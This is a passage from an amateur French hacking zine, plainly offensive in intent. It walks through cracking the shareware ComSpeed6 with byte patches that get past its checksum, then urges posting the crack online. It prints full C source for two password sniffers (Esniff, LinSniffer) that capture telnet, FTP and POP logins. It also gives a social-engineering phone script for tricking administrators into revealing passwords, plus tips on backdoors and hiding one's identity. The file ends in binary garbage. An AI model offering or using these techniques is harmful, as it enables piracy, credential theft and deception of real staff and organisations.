Maintenant vous allez devoir faire ce que l'on apelle une backdoor (=porte de derrire, un accs cach quoi) afin de revenir ds que vous le dsirez. Pour cela, il existe des rootkits, des backdoors dj toutes prepares,  votre disposition sur la toile.      :))
Alors elle est pas belle la vie? Mais faites attention, c'est mauvais de revenir sur les lieux de son crime. Mieux vaut vous loggez sur un autre compte avant de revenir sur un serveur... Prenez garde !!!                :p




21/La programmation, ce qu'il faut savoir matriser

Bon, ce n'est un secret pour personne, mais le langage le plus important dans le hacking, c'est le C. Cependant, je ne vous conseille pas d'apprendre le C en premier si vous dbutez. Il faut d'abord que vous assimiliez certaines notions de programmation et surtout que vous soyiez cal en math (nan je plaisante dtendez vous :op)...
Alors par o commencer? Personnelement je vous dirais par le Visual Basic, du moins si vous connaisez dj un peu le BASIC. Sinon, apprenez le delphi et aussi, trs important, le HTML, bien que ce ne soit pas vritablement un langage de programmation, il est trs utile pour faciliter l'apprentissage du C. Ensuite donc, apprenez le C. Puis vous passerez au C++ (malgrs la ressemblance ce sont des langages trs diffrents vous verrez). Et puis aprs, essayez d'apprendre le Java, ce langage est trs tourn vers l'avenir du hack, il vous sera sans doute bien utile dans les annes  venir. Apprenez aussi quelques commandes DOS et linux (mme si on peut pas trop parler de programmation dans ces deux cas).
Une chose galement trs importante, quelque soit le langage que vous apprenez, c'est le compilateur. C'est un outil qui vous permet de programmer, et de compiler votre programme, c'est  dire le rendre xecutable. Cherchez en sur le Net. Pour ce qui est des cours de programmations, le mieux c'est d'apprendre dans les livres, pas dans les zines qui fatiguent trop la vue ou devant un enseignant qui fatigue trop les oreilles... N'oubliez jamais, la programmation est l'essence mme du bon hacker. Le stade ultime pour celui-ci, c'est d'apprendre un langage en seulement quelques jours. Une dernire chose, pour bien matriser un langage de programmation, il y'a deux choses essentielles: lire du code et crire du code. Vous aurez beau connatre toutes les fonctions possibles du C, vous ne pourrez jamais vous considerez comme un vrai programmeur tant que vous ferez pas vous mme vos propres programmes. 
Voil, j'espere m'tre fait compris. On va tout de mme rester dans la programmation avec le petit cours d'ASM qui va suivre...    :-> 




22/Introduction au cracking, manipuler l'Assembleur (ASM)

Le cracking consiste  faire sauter les protections d'un programme, afin de le diffuser gratuitement sur le net. 
Il existe deux mthodes pour cracker un programme:

Live Approach: Cette mthode consiste  dbugger le programme en lui posant des breack points et en le tracant. On utilisera pour ce faire un debuggeur, comme par exemple SoftIce.

Dead listing: Cette mthode nous interessera plus particulirement car elle consiste  dessasembler un programme quelconque afin de modifier son shma de protection. On utilisera un dssasembleur, W32Dasm est le plus adapt si vous avez Windows 9x.

Nous allons cracker ComSpeed6, comme il ne fait que 53ko, nous utiliserons le "Dead Listing".
Nous aurons besoin pour ce crack de W32Dasm6.
Lancez donc le desassembleur et ouvrez ComSpeed6. Cliquez sur "String Data reference" dans la barre d'outil. Vous allez obtenir entre autre:
>CodeFalse_
>CodeOk_
>Virus_          
Jetez un oeil sur CodeOk. W32Dasm vous envoie sur la routine qui commence  l'adresse 0011.0271. Juste aprs on trouve la procdure CodeFalse en 0011.02A4. Voil ce que ca donne:
>0011.0262 9AFFFF0000 call 0012.02E5h >0011.0267 08C0 or al , al >0011.0269 7433 je 029E                                                                           >0011.026B FF76F0 push word ptr [bp+F0] >0011.026E FF76EE push word ptr [bp+EE] 
>* Possible StringData Ref from Data Seg 017 ->"CODEOK_%s"            >0011.0271 BFF104 mov di, 04F1 >0011.0274 1E push ds 
On y trouve un saut conditionnel, je029E qui nous enverra sur la procdure CodeFalse si le mot de passe est incorrect. 
On le change en jne:
>0011.0269 7533 jne 029E
Lancez maintanant ComSpeed6 avec un diteur hexadcimal. Le programme nous dit:
>"The .exe file has been modified! That can be a Virus..."
Vous vous rappelez de Virus_? C'est un checksum, le programme additione les bytes et vrifie le rsultat.
Nous avons chang un je (74) par un jne (75). Nous allons modifier les bytes qui suivent. Nous avions:
>0011.0269  7433   je   029E
Que nous avons chang en :
>0011.0269  7533   jne   029E
On va donc modifier le 33 qui suit. Cela nous donne:
>0011.0269  7532   jne   029E

Car 75+32=74+33. Le checksum est contourn.
Lancez maintenant ComSpeed6 et registrez vous avec n'importe quel mot de passe, ca marche.
Quittez ComSpeed6 et relancez le, il n'est plus enregistr.    :-(

Nous nous sommes juste dbarasss de la procdure de vrification du mot de passe, le crack est loin d'tre termin.

Maintenant ouvrez ComSpeed.ini. On obtient:
>SwName=_Votre_Nom
>SwCode=_Votre_Mot_De_Passe

Vous savez donc comment le programme enregistre votre nom et votre mot de passe.

Revenons  notre W32Dasm6. Cliquez dans la barre  outil sur "Import Functions". Une liste de toutes les fonctions de Windows (les API) va s'afficher. 
Pour crer une barre de menu, un programme Windows doit appeller la fonction "User!DrawMenuBar. Cliquez sur elle pour visualiser les diffrents appels  celle-ci dans ComSpeed.

On trouve deux appels. Le deuxime est trs intressant:
 
>0001.1756 9AFFFF0000 call 0011.0122h >0001.175B 803ED00400 cmp byte ptr [04D0], 00 >0001.1760 7531 jne 1793                                                                         >0001.1762 FF363C0A push word ptr [0A3C] >0001.1766 FF363A0A push word ptr [0A3A] >0001.176A 9AFFFF0000 call 0006.0044h >0001.176F FF363407 push word ptr [0734] >0001.1773 6A02 push 0002 >0001.1775 680004 push 0400 >0001.1778 9AFFFF0000 call USER.DELETEMENU                             >0001.177D FF760E push word ptr [bp+0E] >0001.1780 9AFFFF0000 call USER.DRAWMENUBAR >0001.1785 FF760E push word ptr [bp+0E] >0001.1788 6A00 push 0000 
On constate donc  l'adresse 0001.1778 l'appel  la procdure User!DeleteMenu qui va effacer la barre de menu et tout de suite aprs, l'appel  User!DrawMenuBar qui va en crer un nouvelle sans le mot "shareware".
Encore un peu au dessus, on trouve un saut conditionnel, jne 1793, qui, si 04D0 est diffrent de zro, nous fera sauter par dessus les deux fonctions User!DeleteMenu et User!DrawMenuBar.
On en dduit donc que, si "byte ptr [04D0]=0" , alors le programme est enregistr. "cmp byte ptr [04D0], 00" est prsent dix fois dans le listing de ComSpeed6.
On va maintenant chercher l'instruction qui va crire  l'adresse 04D0.
On en trouve qu'une seule:
>0011.0D27 9AFFFF0000 call 0012.02E5h >0011.0D2C 08C0 or al , al >0011.0D2E B000 mov al, 00 ; al:=0 >0011.0D30 7501 jne 0D33                                                                              >0011.0D32 40 inc ax ; al:=al+1 >0011.0D33 A2D004 mov [04D0], al ; **ICI** 04D0=al >0011.0D36 803ED00400 cmp byte ptr [04D0], 00                                          >0011.0D3B 7527 jne 0D64 >0011.0D3D FF36D404 push word ptr [04D4] >0011.0D41 FF36D204 push word ptr [04D2] 
A cause du checksum, on ne peut pas se permettre de modifier le jne 0D64 en je 0D64.
On va donc plutt intervertir les instructions.

Nous avions:
>0011.0D2E B000 mov al, 00 >0011.0D30 7501 jne 0D33 >0011.0D32 40 inc ax 
>0011.0D33 A2D004 mov [04D0], al >0011.0D36 803ED00400 cmp byte ptr [04D0], 00 >0011.0D3B 7527 jne 0D64 
Que l'on peut changer en:
>0011.0D2E 7501 jne 0D31                                                                                                 >0011.0D30 40 inc ax ; al:=al+1 >0011.0D31 B000 mov al, 00 ; al:=0                                                                                           
>0011.0D33 A2D004 mov [04D0], al >0011.0D36 803ED00400 cmp byte ptr [04D0], 00 >0011.0D3B 7527 jne 0D64 
Et voil !!! Dsormais "al=0" et l'instruction "mov [04D0], al" donnera la valeur zro, donc "Registered, dans l'adresse 04D0.
Le rsultat de "cmp byte ptr [04D0], 00" sera donc toujours vrai et ComSpeed6 ne s'en aperoivera pas. Il est maintenant enregistr.
Vous n'avez plus qu' mettre votre crack en tlechargement gratuit sur Internet... Voil !!!
Cet exemple devrait vous aider par la suite pour cracker d'autres programmes de la mme catgorie. Si vous voulez vraiment TOUT savoir sur l'ASM cherchez dans une librairie le bouquin "Assembleur Pratique", de B.Fabrot, il doit bien pouvoir se trouver quelque part.   :))




23/L'art du sniffing

Pour sniffer, dj, il faut que vous ayez un sniffer (lol). Un sniffer est un outil permettant d'intercepter des packet contenant des donnes, qui circulent sur un rseau.
Ces donnes sont bien entendus codes, et varient selon le filtrage de packets que vous utilisez, le protocole que vous sniffez. Voici maintenant une liste des sniffers les plus utiliss:

-Esniff, trouvable un peu partout sur le net. Voici son code source,  compiler en c :

/* Esniff.c */ 
#include <stdio.h> #include <ctype.h> #include <string.h> 
#include <sys/time.h> #include <sys/file.h> #include <sys/stropts.h> #include <sys/signal.h> #include <sys/types.h> #include <sys/socket.h> #include <sys/ioctl.h> 
#include <net/if.h> #include <net/nit_if.h> #include <net/nit_buf.h> #include <net/if_arp.h> 
#include <netinet/in.h> #include <netinet/if_ether.h> #include <netinet/in_systm.h> #include <netinet/ip.h> #include <netinet/udp.h> #include <netinet/ip_var.h> #include <netinet/udp_var.h> #include <netinet/in_systm.h> #include <netinet/tcp.h> #include <netinet/ip_icmp.h> 
#include <netdb.h> #include <arpa/inet.h> 
#define ERR stderr 
char *malloc(); char *device, *ProgName, *LogName; FILE *LOG; int debug=0; 
#define NIT_DEV "/dev/nit" #define CHUNKSIZE 4096 /* device buffer size */ int if_fd = -1; int Packet[CHUNKSIZE+32]; 
void Pexit(err,msg) int err; char *msg; { perror(msg); exit(err); } 
void Zexit(err,msg) int err; char *msg; { fprintf(ERR,msg); exit(err); } 
#define IP ((struct ip *)Packet) #define IP_OFFSET (0x1FFF) #define SZETH (sizeof(struct ether_header)) #define IPLEN (ntohs(ip->ip_len)) #define IPHLEN (ip->ip_hl) #define TCPOFF (tcph->th_off) #define IPS (ip->ip_src) #define IPD (ip->ip_dst) #define TCPS (tcph->th_sport) #define TCPD (tcph->th_dport) #define IPeq(s,t) ((s).s_addr == (t).s_addr) 
#define TCPFL(FLAGS) (tcph->th_flags & (FLAGS)) 
#define MAXBUFLEN (128) time_t LastTIME = 0; 
struct CREC { struct CREC *Next, *Last; time_t Time; /* start time */ struct in_addr SRCip, DSTip; u_int SRCport, /* src/dst ports */ DSTport; u_char Data[MAXBUFLEN+2]; /* important stuff :-) */ u_int Length; /* current data length */ u_int PKcnt; /* # pkts */ u_long LASTseq; }; 
struct CREC *CLroot = NULL; 
char *Symaddr(ip) register struct in_addr ip; { register struct hostent *he = gethostbyaddr((char *)&ip.s_addr, sizeof(struct in_addr),AF_INET); 
return( (he)?(he->h_name):(inet_ntoa(ip)) ); } 
char *TCPflags(flgs) register u_char flgs; { static char iobuf[8]; #define SFL(P,THF,C) iobuf[P]=((flgs & THF)?C:'-') 
SFL(0,TH_FIN, 'F'); SFL(1,TH_SYN, 'S'); SFL(2,TH_RST, 'R'); SFL(3,TH_PUSH,'P'); SFL(4,TH_ACK, 'A'); SFL(5,TH_URG, 'U'); iobuf[6]=0; return(iobuf); } 
char *SERVp(port) register u_int port; { static char buf[10]; register char *p; 
switch(port) { case IPPORT_LOGINSERVER: p="rlogin"; break; case IPPORT_TELNET: p="telnet"; break; case IPPORT_SMTP: p="smtp"; break; default: sprintf(buf,"%u",port); p=buf; break; } return(p); } 
char *Ptm(t) register time_t *t; { register char *p = ctime(t); p[strlen(p)-6]=0; /* strip " YYYY\n" */ return(p); } 
char *NOWtm() { time_t tm; time(&tm); return( Ptm(&tm) ); } 
#define MAX(a,b) (((a)>(b))?(a):(b)) #define MIN(a,b) (((a)<(b))?(a):(b)) 
/* add an item */ #define ADD_NODE(SIP,DIP,SPORT,DPORT,DATA,LEN) { \ register struct CREC *CLtmp = \ (struct CREC *)malloc(sizeof(struct CREC)); \ time( &(CLtmp->Time) ); \ CLtmp->SRCip.s_addr = SIP.s_addr; \ CLtmp->DSTip.s_addr = DIP.s_addr; \ CLtmp->SRCport = SPORT; \ CLtmp->DSTport = DPORT; \ CLtmp->Length = MIN(LEN,MAXBUFLEN); \ bcopy( (u_char *)DATA, (u_char *)CLtmp->Data, CLtmp->Length); \ CLtmp->PKcnt = 1; \ CLtmp->Next = CLroot; \ CLtmp->Last = NULL; \ CLroot = CLtmp; \ } 
register struct CREC *GET_NODE(Sip,SP,Dip,DP) register struct in_addr Sip,Dip; register u_int SP,DP; { register struct CREC *CLr = CLroot; 
while(CLr != NULL) { if( (CLr->SRCport == SP) && (CLr->DSTport == DP) && IPeq(CLr->SRCip,Sip) && IPeq(CLr->DSTip,Dip) ) break; CLr = CLr->Next; } return(CLr); } 
#define ADDDATA_NODE(CL,DATA,LEN) { \ bcopy((u_char *)DATA, (u_char *)&CL->Data[CL->Length],LEN); \ CL->Length += LEN; \ } 
#define PR_DATA(dp,ln) { \ register u_char lastc=0; \ while(ln-- >0) { \ if(*dp < 32) { \ switch(*dp) { \ case '\0': if((lastc=='\r') || (lastc=='\n') || lastc=='\0') \ break; \ case '\r': \ case '\n': fprintf(LOG,"\n : "); \ break; \ default : fprintf(LOG,"^%c", (*dp + 64)); \ break; \ } \ } else { \ if(isprint(*dp)) fputc(*dp,LOG); \ else fprintf(LOG,"(%d)",*dp); \ } \ lastc = *dp++; \ } \ fflush(LOG); \ } 
void END_NODE(CLe,d,dl,msg) register struct CREC *CLe; register u_char *d; register int dl; register char *msg; { fprintf(LOG,"\n-- TCP/IP LOG -- TM: %s --\n", Ptm(&CLe->Time)); fprintf(LOG," PATH: %s(%s) =>", Symaddr(CLe->SRCip),SERVp(CLe->SRCport)); fprintf(LOG," %s(%s)\n", Symaddr(CLe->DSTip),SERVp(CLe->DSTport)); fprintf(LOG," STAT: %s, %d pkts, %d bytes [%s]\n", NOWtm(),CLe->PKcnt,(CLe->Length+dl),msg); fprintf(LOG," DATA: "); { register u_int i = CLe->Length; register u_char *p = CLe->Data; PR_DATA(p,i); PR_DATA(d,dl); } 
fprintf(LOG,"\n-- \n"); fflush(LOG); 
if(CLe->Next != NULL) CLe->Next->Last = CLe->Last; if(CLe->Last != NULL) CLe->Last->Next = CLe->Next; else CLroot = CLe->Next; free(CLe); } 
/* 30 mins (x 60 seconds) */ #define IDLE_TIMEOUT 1800 #define IDLE_NODE() { \ time_t tm; \ time(&tm); \ if(LastTIME<tm) { \ register struct CREC *CLe,*CLt = CLroot; \ LastTIME=(tm+IDLE_TIMEOUT); tm-=IDLE_TIMEOUT; \ while(CLe=CLt) { \ CLt=CLe->Next; \ if(CLe->Time <tm) \ END_NODE(CLe,(u_char *)NULL,0,"IDLE TIMEOUT"); \ } \ } \ } 
void filter(cp, pktlen) register char *cp; register u_int pktlen; { register struct ip *ip; register struct tcphdr *tcph; 
{ register u_short EtherType=ntohs(((struct ether_header *)cp)->ether_type); 
if(EtherType < 0x600) { EtherType = *(u_short *)(cp + SZETH + 6); cp+=8; pktlen-=8; } 
if(EtherType != ETHERTYPE_IP) /* chuk it if its not IP */ return; } 
/* ugh, gotta do an alignment :-( */ bcopy(cp + SZETH, (char *)Packet,(int)(pktlen - SZETH)); 
ip = (struct ip *)Packet; if( ip->ip_p != IPPROTO_TCP) /* chuk non tcp pkts */ return; tcph = (struct tcphdr *)(Packet + IPHLEN); 
if(!( (TCPD == IPPORT_TELNET) || (TCPD == IPPORT_LOGINSERVER) || )) return; 
{ register struct CREC *CLm; register int length = ((IPLEN - (IPHLEN * 4)) - (TCPOFF * 4)); register u_char *p = (u_char *)Packet; 
p += ((IPHLEN * 4) + (TCPOFF * 4)); 
if(debug) { fprintf(LOG,"PKT: (%s %04X) ", TCPflags(tcph->th_flags),length); fprintf(LOG,"%s[%s] => ", inet_ntoa(IPS),SERVp(TCPS)); fprintf(LOG,"%s[%s]\n", inet_ntoa(IPD),SERVp(TCPD)); } 
if( CLm = GET_NODE(IPS, TCPS, IPD, TCPD) ) { 
CLm->PKcnt++; 
if(length>0) if( (CLm->Length + length) < MAXBUFLEN ) { ADDDATA_NODE( CLm, p,length); } else { END_NODE( CLm, p,length, "DATA LIMIT"); } 
if(TCPFL(TH_FIN|TH_RST)) { END_NODE( CLm, (u_char *)NULL,0,TCPFL(TH_FIN)?"TH_FIN":"TH_RST" ); } 
} else { 
if(TCPFL(TH_SYN)) { ADD_NODE(IPS,IPD,TCPS,TCPD,p,length); } 
} 
IDLE_NODE(); 
} 
} 
/* signal handler */ void death() { register struct CREC *CLe; 
while(CLe=CLroot) END_NODE( CLe, (u_char *)NULL,0, "SIGNAL"); 
fprintf(LOG,"\nLog ended at => %s\n",NOWtm()); fflush(LOG); if(LOG != stdout) fclose(LOG); exit(1); } 
/* opens network interface, performs ioctls and reads from it, * passing data to filter function */ void do_it() { int cc; char *buf; u_short sp_ts_len; 
if(!(buf=malloc(CHUNKSIZE))) Pexit(1,"Eth: malloc"); 
/* this /dev/nit initialization code pinched from etherfind */ { struct strioctl si; struct ifreq ifr; struct timeval timeout; u_int chunksize = CHUNKSIZE; u_long if_flags = NI_PROMISC; 
if((if_fd = open(NIT_DEV, O_RDONLY)) < 0) Pexit(1,"Eth: nit open"); 
if(ioctl(if_fd, I_SRDOPT, (char *)RMSGD) < 0) Pexit(1,"Eth: ioctl (I_SRDOPT)"); 
si.ic_timout = INFTIM; 
if(ioctl(if_fd, I_PUSH, "nbuf") < 0) Pexit(1,"Eth: ioctl (I_PUSH \"nbuf\")"); 
timeout.tv_sec = 1; timeout.tv_usec = 0; si.ic_cmd = NIOCSTIME; si.ic_len = sizeof(timeout); si.ic_dp = (char *)&timeout; if(ioctl(if_fd, I_STR, (char *)&si) < 0) Pexit(1,"Eth: ioctl (I_STR: NIOCSTIME)"); 
si.ic_cmd = NIOCSCHUNK; si.ic_len = sizeof(chunksize); si.ic_dp = (char *)&chunksize; if(ioctl(if_fd, I_STR, (char *)&si) < 0) Pexit(1,"Eth: ioctl (I_STR: NIOCSCHUNK)"); 
strncpy(ifr.ifr_name, device, sizeof(ifr.ifr_name)); ifr.ifr_name[sizeof(ifr.ifr_name) - 1] = '\0'; si.ic_cmd = NIOCBIND; si.ic_len = sizeof(ifr); si.ic_dp = (char *)&ifr; if(ioctl(if_fd, I_STR, (char *)&si) < 0) Pexit(1,"Eth: ioctl (I_STR: NIOCBIND)"); 
si.ic_cmd = NIOCSFLAGS; si.ic_len = sizeof(if_flags); si.ic_dp = (char *)&if_flags; if(ioctl(if_fd, I_STR, (char *)&si) < 0) Pexit(1,"Eth: ioctl (I_STR: NIOCSFLAGS)"); 
if(ioctl(if_fd, I_FLUSH, (char *)FLUSHR) < 0) Pexit(1,"Eth: ioctl (I_FLUSH)"); } 
while ((cc = read(if_fd, buf, CHUNKSIZE)) >= 0) { register char *bp = buf, *bufstop = (buf + cc); 
while (bp < bufstop) { register char *cp = bp; register struct nit_bufhdr *hdrp; 
hdrp = (struct nit_bufhdr *)cp; cp += sizeof(struct nit_bufhdr); bp += hdrp->nhb_totlen; filter(cp, (u_long)hdrp->nhb_msglen); } } Pexit((-1),"Eth: read"); } /* Authorize your proogie,generate your own password and uncomment here */ /* #define AUTHPASSWD "EloiZgZejWyms" */ 
void getauth() { char *buf,*getpass(),*crypt(); char pwd[21],prmpt[81]; 
strcpy(pwd,AUTHPASSWD); sprintf(prmpt,"(%s)UP? ",ProgName); buf=getpass(prmpt); if(strcmp(pwd,crypt(buf,pwd))) exit(1); } */ void main(argc, argv) int argc; char **argv; { char cbuf[BUFSIZ]; struct ifconf ifc; int s, ac=1, backg=0; 
ProgName=argv[0]; 
/* getauth(); */ 
LOG=NULL; device=NULL; while((ac<argc) && (argv[ac][0] == '-')) { register char ch = argv[ac++][1]; switch(toupper(ch)) { case 'I': device=argv[ac++]; break; case 'F': if(!(LOG=fopen((LogName=argv[ac++]),"a"))) Zexit(1,"Output file cant be opened\n"); break; case 'B': backg=1; break; case 'D': debug=1; break; default : fprintf(ERR, "Usage: %s [-b] [-d] [-i interface] [-f file]\n", ProgName); exit(1); } } 
if(!device) { if((s=socket(AF_INET, SOCK_DGRAM, 0)) < 0) Pexit(1,"Eth: socket"); 
ifc.ifc_len = sizeof(cbuf); ifc.ifc_buf = cbuf; if(ioctl(s, SIOCGIFCONF, (char *)&ifc) < 0) Pexit(1,"Eth: ioctl"); 
close(s); device = ifc.ifc_req->ifr_name; } 
fprintf(ERR,"Using logical device %s [%s]\n",device,NIT_DEV); fprintf(ERR,"Output to %s.%s%s",(LOG)?LogName:"stdout", (debug)?" (debug)":"",(backg)?" Backgrounding ":"\n"); 
if(!LOG) LOG=stdout; 
signal(SIGINT, death); signal(SIGTERM,death); signal(SIGKILL,death); signal(SIGQUIT,death); 
if(backg && debug) { fprintf(ERR,"[Cannot bg with debug on]\n"); backg=0; } 
if(backg) { register int s; 
if((s=fork())>0) { fprintf(ERR,"[pid %d]\n",s); exit(0); } else if(s<0) Pexit(1,"fork"); 
if( (s=open("/dev/tty",O_RDWR))>0 ) { ioctl(s,TIOCNOTTY,(char *)NULL); close(s); } } fprintf(LOG,"\nLog started at => %s [pid %d]\n",NOWtm(),getpid()); fflush(LOG); 
do_it(); } 

-Spynet , sans doute un des meilleurs, mais il est pas gratuit cui ci, faut le payer hein....  :p
-ATM Sniffer Network Analyser , le meilleur de tous, qui dcode plus de 250 protocoles... Disponible sur http://www.networkassociates.com.
-EtherPeek , disponible sur http://www.aggroup.com , pour Win et Mac.
-Linsniff , un bon sniffer de mot de passe. Voil son code source, en c:
/* LinSniffer 0.02 [BETA] Mike Edulla medulla@infosoc.com DO NOT REDISTRIBUTE */ 
#include <sys/types.h> #include <sys/socket.h> #include <sys/time.h> #include <netinet/in.h> #include <netdb.h> #include <string.h> #include <linux/if.h> #include <signal.h> #include <stdio.h> #include <arpa/inet.h> #include <linux/socket.h> #include <linux/ip.h> #include <linux/tcp.h> #include <linux/if_ether.h> 
int openintf(char *); int read_tcp(int); int filter(void); int print_header(void); int print_data(int, char *); char *hostlookup(unsigned long int); void clear_victim(void); 
struct etherpacket { struct ethhdr eth; struct iphdr ip; struct tcphdr tcp; char buff[8192]; }ep; 
struct { unsigned long saddr; unsigned long daddr; unsigned short sport; unsigned short dport; int bytes_read; char active; time_t start_time; } victim; 
struct iphdr *ip; struct tcphdr *tcp; 
#define CAPTLEN 512 #define TIMEOUT 30 
int openintf(char *d) { int fd; struct ifreq ifr; int s; fd=socket(AF_INET, SOCK_PACKET, htons(0x800)); if(fd < 0) { perror("cant get SOCK_PACKET socket"); exit(0); } strcpy(ifr.ifr_name, d); s=ioctl(fd, SIOCGIFFLAGS, &ifr); if(s < 0) { close(fd); perror("cant get flags"); exit(0); } ifr.ifr_flags |= IFF_PROMISC; s=ioctl(fd, SIOCSIFFLAGS, &ifr); if(s < 0) perror("cant set promiscuous mode"); return fd; } 
int read_tcp(int s) { int x; while(1) { x=read(s, (struct etherpacket *)&ep, sizeof(ep)); if(x > 1) { if(filter()==0) continue; x=x-54; if(x < 1) continue; return x; } } } 
int filter(void) { int p; p=0; if(ip->protocol != 6) return 0; if(victim.active != 0) if(victim.bytes_read > CAPTLEN) { printf("\n----- [CAPLEN Exceeded]\n"); clear_victim(); return 0; } if(victim.active != 0) if(time(NULL) > (victim.start_time + TIMEOUT)) { printf("\n----- [Timed Out]\n"); clear_victim(); return 0; } if(ntohs(tcp->dest)==21) p=1; /* ftp */ if(ntohs(tcp->dest)==23) p=1; /* telnet */ if(ntohs(tcp->dest)==110) p=1; /* pop3 */ if(ntohs(tcp->dest)==109) p=1; /* pop2 */ if(ntohs(tcp->dest)==143) p=1; /* imap2 */ if(ntohs(tcp->dest)==513) p=1; /* rlogin */ if(ntohs(tcp->dest)==106) p=1; /* poppasswd */ if(victim.active == 0) if(p == 1) if(tcp->syn == 1) { victim.saddr=ip->saddr; victim.daddr=ip->daddr; victim.active=1; victim.sport=tcp->source; victim.dport=tcp->dest; victim.bytes_read=0; victim.start_time=time(NULL); print_header(); } if(tcp->dest != victim.dport) return 0; if(tcp->source != victim.sport) return 0; if(ip->saddr != victim.saddr) return 0; if(ip->daddr != victim.daddr) return 0; if(tcp->rst == 1) { victim.active=0; alarm(0); printf("\n----- [RST]\n"); clear_victim(); return 0; } if(tcp->fin == 1) { victim.active=0; alarm(0); printf("\n----- [FIN]\n"); clear_victim(); return 0; } return 1; } 
int print_header(void) { puts(" "); printf("%s => ", hostlookup(ip->saddr)); printf("%s [%d]\n", hostlookup(ip->daddr), ntohs(tcp->dest)); } 
int print_data(int datalen, char *data) { int i=0; int t=0; 
victim.bytes_read=victim.bytes_read+datalen; for(i=0;i != datalen;i++) { if(data[i] == 13) {puts(" ");t=0;} if(isprint(data[i])) {printf("%c", data[i]);t++;} if(t > 75) {t=0;puts(" ");} } } 
main() { int s; s=openintf("eth0"); ip=(struct iphdr *)(((unsigned long)&ep.ip)-2); tcp=(struct tcphdr *)(((unsigned long)&ep.tcp)-2); signal(SIGHUP, SIG_IGN); clear_victim(); for(;;) { read_tcp(s); if(victim.active != 0) print_data(htons(ip->tot_len)-sizeof(ep.ip)-sizeof(ep.tcp), ep.buff-2); } } 
char *hostlookup(unsigned long int in) { static char blah[1024]; struct in_addr i; struct hostent *he; 
i.s_addr=in; he=gethostbyaddr((char *)&i, sizeof(struct in_addr),AF_INET); if(he == NULL) strcpy(blah, inet_ntoa(i)); else strcpy(blah, he->h_name); return blah; } 
void clear_victim(void) { victim.saddr=0; victim.daddr=0; victim.sport=0; victim.dport=0; victim.active=0; victim.bytes_read=0; victim.start_time=0; } 

Voil donc pour ce qui est des sniffer. Pour ceux qui n'en comprenent pas l'intert, imaginez que vous ayez un sniffer de plac sur une tte de rseau (= un serveur ) en rseau local... Vous pourrez alors interceptez tous les packets qui circulent entre les ordinateurs du rseau, les filtrez, et en tirez pourquoi pas des informations trs interessantes...




24/Le social engeneering

Ou le summum du canular tlphonique...
Supposons que je veux pirater un site quelqueconque, www.exemple.com par exemple. Avec WSpingPr je rcolte toutes les informations concernant le site. Puis je regarde les numeros de telephone des admins, pis je commence  me demander: Et si j'essayer de leur soutirer des infos par telephone? Voil, c'est a le S.E . Bien sr, vous avez intret  avoir beaucoup d'imagination au tlephone, sinon vous serez bloqu...

Quelques petits point  respecter avant de commencer:

-Tachez d'avoir une voix mature, si vous avez une voix d'un gamin de 11 ans, laissez tomber ou faites de votre mieux pour camouflez votre voix.
-Essayez d'tre le plus anonyme possible, telephonez a partir d'une cabine, et avant de composer le numro, faites le 3651, ca empechera le boitier de france telecom de reperer votre numro.
-Avant de telephoner, runissez sur un bloc notes toutes les informations concernant le site.

Bon, voil, maintanant, prenons un exemple de conversation:
Vous: Bonjour, ici Franck, le stagiaire du 2me. J'ai un problme, voil y'a l'ordinateur qui me demande d'entrer un login et un mot de passe , alors je met le mot que monsieur Admin1 (le nom d'un des admins pas celui ci :p) m'a donn, pis aprs ca me met "mot de passe incorrect" qu'est ce que je fais?
Admin2: Ouiiiiiii, je vois. Alors, prenez un crayon pour noter, le mot de passe est : ......
Ne vous exciter pas trop vite, a se passera toujours aussi facilement... Mais les miracles a arrive vous savez!!!   :))





25/Conclusion

Et bah, voil qui va clore mon tout premier zine sur le hacking...
En esperant qu'il vous a plu, crivez moi a nickairmax@caramail.com pour me donner votre avis, si vous avez des suggestions, commentaires...
A un prochain numro ptet !!!

HACK TA MERE
[Kefka]






































 























 





 











































 









    :  {{              hh                       	  E                {{              -  	             "    -     	            MS Sans Serif  I   -         :  {{              hh                       	  E                {{              -  	             "    -     	            MS Sans Serif  I   -         :  {{              hh                       	  E                {{              -  	             "    -     	            MS Sans Serif  I   -         :  {{              hh                       	  E                {{              -  	             "    -     	            MS Sans Serif  I   -         :  {{              hh                       	  E                {{              -  	             "    -     	            MS Sans Serif  I   -                                                                                                                                                                                                                                                                                                                                                                                                                      V  _  `  j  k  l  t  u  v              1  2  [  \                      0  1  U  V            ÿ{wsokgc_ ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  
U] ^c  
U] ^c   
U] ^c   ] c   ] c   ] c   
U] ^a	cH 
U] ^a	cH  %        O  P               4  5  o  p                                      Y	  Z	        ÿ~yuqmiea] c  ] c  ] c  ] c  ] c  ] c  ] ^c   ] ^c   ] c  ] c  ] c  ] c  ] c  ] c  
V] ^c  
V] ^c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c   &            @  A  Z  P  Q  ]              @  A                      L  M  N      !  =$  >$  ¾zuqmiea     ] c  ] c  ] c  ] c  ] c  ] ^c  ] ^c   ] ^c   ] ^c   ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  V] c  ] c  ] c  V] c  ] c  ] c  V] c  ] c  ] c  V] c  ] c  ] c  V] c  ] c  ] c  V] c  ] c   %>$  ?$  %  %  %  %  %  &  	&  
&  &  &  
&  &  &  &  &  &  0&  1&  2&  3&  4&  5&  6&  A&  B&  C&  ]&  ^&  _&  `&  a&  b&  c&  d&  l&  m&  n&  ÿ{wsokg            ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c   &n&  &  &  &  &  &  &  &  &  &  &  &  &  &  &  &  &  &  &  &  &  &  &  &  &  &  &  &  &  &  &  &  &  &  '  '  '  '  '  ÿ{wsokg            ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c